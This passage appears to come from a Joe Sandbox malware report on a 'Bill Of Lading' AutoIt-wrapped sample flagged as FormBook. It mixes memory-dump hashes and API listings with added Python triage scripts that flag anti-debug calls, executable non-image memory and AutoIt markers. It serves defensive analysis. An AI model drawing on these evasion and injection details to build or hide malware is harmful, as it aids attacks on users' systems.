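    args: List[str]            # argument column as printed ("?" = not resolved statically)
    ref: int                   # virtual address of the call site
    subcall_of: Optional[int]  # enclosing subroutine for "Part of subcall function" bullets


def parse_api_lines(text: str) -> List[ApiRef]:
    """Turn the report's API bullets into records; lines that do not match are skipped."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m["args"].strip()
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        refs.append(ApiRef(
            api=m["api"],
            module=m["mod"],
            args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return refs


# Editor's triage notes (assumed wording, not a Joe Sandbox classification);
# they echo behaviours the report's own signature list names.
TRIAGE = {
    "BlockInput": "blocks mouse/keyboard input (hinders interactive debugging)",
    "SetUnhandledExceptionFilter": "installs a top-level exception filter (anti-debug / crash masking)",
    "InternetQueryDataAvailable": "WinINet read of remote data",
    "InternetReadFile": "WinINet read of remote data",
    "LogonUserW": "validates a username/password against the local system or domain",
    "FindFirstFileW": "file-system enumeration",
}


def triage(refs: List[ApiRef]) -> List[Tuple[int, str, str, str]]:
    """Return (call_site, module, api, note) for flagged calls, ordered by call-site address."""
    findings = []
    for r in refs:
        note = TRIAGE.get(r.api)
        if note is None:
            continue
        # BlockInput(FALSE) only re-enables input; the report shows BlockInput(00000001), i.e. TRUE.
        if r.api == "BlockInput" and r.args and r.args[0] != "?" and int(r.args[0], 16) == 0:
            continue
        findings.append((r.ref, r.module, r.api, note))
    return sorted(findings)


# Constructed sample: the API bullets copied from the function blocks above.
REPORT_EXCERPT = """
• InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
• InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
• FindClose.KERNEL32(00000000), ref: 0045DDDD
• DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
• BlockInput.USER32(00000001), ref: 0045A272
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
• SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
"""

if __name__ == "__main__":
    for addr, mod, api, note in triage(parse_api_lines(REPORT_EXCERPT)):
        print(f"{addr:08X} {mod}!{api}: {note}")
```

Running it lists the six flagged call sites in address order, with SetUnhandledExceptionFilter at 00422033 first and FindFirstFileW at 0045DDA1 last; the `subcall_of` field keeps the GetLastError bullet attached to its parent routine 0044286A so the parent, not the callee, is what you jump to in the dump. Addresses are the virtual addresses from the 00400000-based image named in each block's Memory Dump Source line.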
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction ID: 37d3b16e4d7fbdc1d408653d91c59978c189066bcc17fd4382dd9db6b1de8678
                                                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction Fuzzy Hash: ED41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
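The two dump names that recur on this page share one dotted layout, and the differences between them are the triage signal. The 0x00400000 region and its neighbours are marked `based on PE: true` and carry the read-only, execute-read and read-write protections one expects from the sections of a mapped image, while the 0x04020000 region is `based on PE: false`, executable and private, that is, code belonging to no loaded module. That is the kind of region a packer or an injector fills, it is where a payload signature such as the FormBook YARA hit in the signature list would typically land, and it is the dump to scan first. The Python below is an added example and is not part of the Joe Sandbox report: it decodes the dotted fields of an `.sdmp` name and flags executable, non-image regions. The field order (PID, stage, dump id, base address, protection, an unknown field, allocation type, an unknown field) is inferred from the names on this page and is an assumption, not a documented format; the `PAGE_*` and `MEM_*` values are the standard Windows constants; `parse_sdmp_name` and `triage_sdmp_names` are hypothetical helper names.

```python
"""Triage Joe Sandbox .sdmp memory-dump names for executable, non-image memory.

Added example, not part of the Joe Sandbox report. The field order below is
inferred from the dump names shown on this page (an assumption, not a
documented format); PAGE_* and MEM_* are the standard Windows constants.
"""
import re
from dataclasses import dataclass

# Windows page protections (winnt.h). Only the low byte is a protection value;
# PAGE_GUARD and friends are modifier bits above it and are masked off.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # every PAGE_EXECUTE* value has one of bits 4..7 set

# Allocation types as returned in MEMORY_BASIC_INFORMATION.Type.
MEM_TYPE = {
    0x20000: "MEM_PRIVATE",
    0x40000: "MEM_MAPPED",
    0x1000000: "MEM_IMAGE",
}

# Assumed layout of the eight dotted fields, inferred from this page:
#   pid . stage . dump_id . base_address . protect . <unknown> . mem_type . <unknown>
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<mem_type>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Region:
    base: int
    protect: str
    mem_type: str
    executable: bool
    image_backed: bool

    @property
    def suspicious(self) -> bool:
        """Executable memory not backed by a loaded module: where unpacked or
        injected code lives, and where payload signatures tend to match."""
        return self.executable and not self.image_backed


def parse_sdmp_name(name: str) -> Region:
    """Decode one .sdmp file name into a Region; raises ValueError on mismatch."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    protect_raw = int(m["protect"], 16)
    mem_type_raw = int(m["mem_type"], 16)
    return Region(
        base=int(m["base"], 16),
        protect=PAGE_PROTECT.get(protect_raw & 0xFF, f"0x{protect_raw:X}"),
        mem_type=MEM_TYPE.get(mem_type_raw, f"0x{mem_type_raw:X}"),
        executable=bool(protect_raw & EXECUTE_MASK),
        image_backed=(mem_type_raw == 0x1000000),
    )


def triage_sdmp_names(names):
    """Return the regions to look at first: executable and not image-backed."""
    return [r for r in (parse_sdmp_name(n) for n in names) if r.suspicious]


# Constructed input: the dump names that appear on this page.
PAGE_DUMPS = [
    "00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in triage_sdmp_names(PAGE_DUMPS):
        print(f"0x{r.base:08X} {r.protect} {r.mem_type} -> dump and scan first")
```

Run against the four names above, only the 0x04020000 region is reported (PAGE_EXECUTE_READWRITE, MEM_PRIVATE); the image-backed 0x00400000, 0x00401000 and 0x00490000 regions decode as PAGE_READONLY, PAGE_EXECUTE_READ and PAGE_READWRITE under MEM_IMAGE and are skipped.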
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction ID: 1b27aff6e64f89232993224e93e306ec7bce5b3dc7d4e714c295d9280e73077f
                                                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction Fuzzy Hash: 14019278A01119EFCB44DFA8C6909AEF7F5FB48310F208699DC09A7741D734AE41DB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction ID: 49235fcf1df2cd308370c6d394f215495e797babb7e4ed3217430afe590910d1
                                                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction Fuzzy Hash: 03018078A10219EFCB48DFA8C6909AEF7F5FB48310F208599DC19A7745D734AE41DB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                      • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                      • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                      • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                      • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                      • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                      • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                      • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                      • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                      • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                      • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                      • _wcslen.LIBCMT ref: 00459800
                                                                                                                      • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                      • GetDC.USER32(?), ref: 004598DE
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                      • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
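The call sequence above is recognisable library code rather than anything the sample's author wrote: a top-level window of class `AutoIt v3`, two `static` children, the image file read into an HGLOBAL and loaded through `CreateStreamOnHGlobal` and `OleLoadPicture`, `SendMessageW` with 0x172 (STM_SETIMAGE) to set it on the control, `GetStockObject(0x11)` (DEFAULT_GUI_FONT), `GetDeviceCaps(0x5A)` (LOGPIXELSY) and `SendMessageW` with 0x30 (WM_SETFONT). That is the AutoIt runtime's splash-image routine, so the submitted file is an AutoIt-compiled executable, and the FormBook detection in the signatures is consistent with a payload that the wrapper unpacks into the non-image 0x04020000 region rather than with this code. A quick triage check for such a sample is whether the binary carries the AutoIt runtime markers. The Python below is an added example, not part of the Joe Sandbox report or of AutoIt: the `AutoIt v3` class name is taken from the `CreateWindowExW` call above, while the `AU3!EA06` compiled-script magic and the "third-party compiled AutoIt script" message are markers of AutoIt-compiled executables known to the editor, not facts from this page; `scan_autoit` and the constructed buffers are the editor's own.

```python
"""Check a binary for AutoIt v3 runtime markers.

Added example, not part of the Joe Sandbox report or of AutoIt. The
"AutoIt v3" window class comes from the CreateWindowExW call listed on this
page; the "AU3!EA06" compiled-script magic and the runtime error message are
markers of AutoIt-compiled executables in general (editor's knowledge, not
taken from this report).
"""
from dataclasses import dataclass, field

# Text markers are searched both as ASCII and as UTF-16LE, since the AutoIt
# runtime is a Unicode build and the encoding of a given string in the image
# should not be assumed.
TEXT_MARKERS = {
    "window_class": "AutoIt v3",
    "runtime_message": "This is a third-party compiled AutoIt script.",
}
# The compiled-script header magic is a plain byte string.
RAW_MARKERS = {"script_magic": b"AU3!EA06"}


def _needles():
    for name, text in TEXT_MARKERS.items():
        yield name, text.encode("ascii")
        yield name, text.encode("utf-16-le")
    yield from RAW_MARKERS.items()


def find_all(data: bytes, needle: bytes) -> list:
    """All offsets of needle in data (overlapping matches included)."""
    offs, i = [], data.find(needle)
    while i != -1:
        offs.append(i)
        i = data.find(needle, i + 1)
    return offs


@dataclass
class AutoItReport:
    hits: dict = field(default_factory=dict)  # marker name -> sorted offsets

    @property
    def is_autoit(self) -> bool:
        # The class name alone also appears in legitimate software that embeds
        # AutoIt, so require the script magic or two independent markers.
        return "script_magic" in self.hits or len(self.hits) >= 2


def scan_autoit(data: bytes) -> AutoItReport:
    """Scan a raw file image (or memory dump) for AutoIt runtime markers."""
    report = AutoItReport()
    for name, needle in _needles():
        offs = find_all(data, needle)
        if offs:
            report.hits.setdefault(name, []).extend(offs)
    for offs in report.hits.values():
        offs.sort()
    return report


# Constructed buffers, not real samples: one mimicking the strings an
# AutoIt-compiled binary carries, one that only contains the class name.
FAKE_AUTOIT = (
    b"MZ" + b"\x00" * 62
    + TEXT_MARKERS["window_class"].encode("utf-16-le") + b"\x00" * 16
    + TEXT_MARKERS["runtime_message"].encode("utf-16-le") + b"\x00" * 8
    + RAW_MARKERS["script_magic"] + b"\x00" * 32
)
FAKE_OTHER = b"MZ" + b"\x00" * 64 + TEXT_MARKERS["window_class"].encode("utf-16-le") + b"\x00" * 64

if __name__ == "__main__":
    for label, buf in (("fake AutoIt build", FAKE_AUTOIT), ("class name only", FAKE_OTHER)):
        rep = scan_autoit(buf)
        print(f"{label}: is_autoit={rep.is_autoit} markers={sorted(rep.hits)}")
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `scan_autoit`; the same function can be run over the 0x04020000 dump to confirm that the unpacked region does not carry the AutoIt markers, which is what one expects if the runtime is only the wrapper.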
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 4040870279-2373415609
APIs
• GetSysColor.USER32(00000012), ref: 00441E64
• SetTextColor.GDI32(?,?), ref: 00441E6C
• GetSysColorBrush.USER32(0000000F), ref: 00441E83
• GetSysColor.USER32(0000000F), ref: 00441E8F
• SetBkColor.GDI32(?,?), ref: 00441EAA
• SelectObject.GDI32(?,?), ref: 00441EBA
• InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
• GetSysColor.USER32(00000010), ref: 00441EF8
• CreateSolidBrush.GDI32(00000000), ref: 00441EFF
• FrameRect.USER32(?,?,00000000), ref: 00441F10
• DeleteObject.GDI32(?), ref: 00441F1B
• InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
• FillRect.USER32(?,?,?), ref: 00441FB6
  • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
  • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
  • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
  • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
  • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
  • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
  • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
  • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
  • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
  • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
  • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
  • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
  • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
• String ID:
• API String ID: 69173610-0
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-3360698832
APIs
• GetSysColor.USER32(0000000E), ref: 00433D81
• SetTextColor.GDI32(?,00000000), ref: 00433D89
• GetSysColor.USER32(00000012), ref: 00433DA3
• SetTextColor.GDI32(?,?), ref: 00433DAB
• GetSysColorBrush.USER32(0000000F), ref: 00433DBF
• GetSysColor.USER32(0000000F), ref: 00433DCB
• CreateSolidBrush.GDI32(?), ref: 00433DD4
• GetSysColor.USER32(00000011), ref: 00433DEB
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
• SelectObject.GDI32(?,00000000), ref: 00433E0D
• SetBkColor.GDI32(?,?), ref: 00433E19
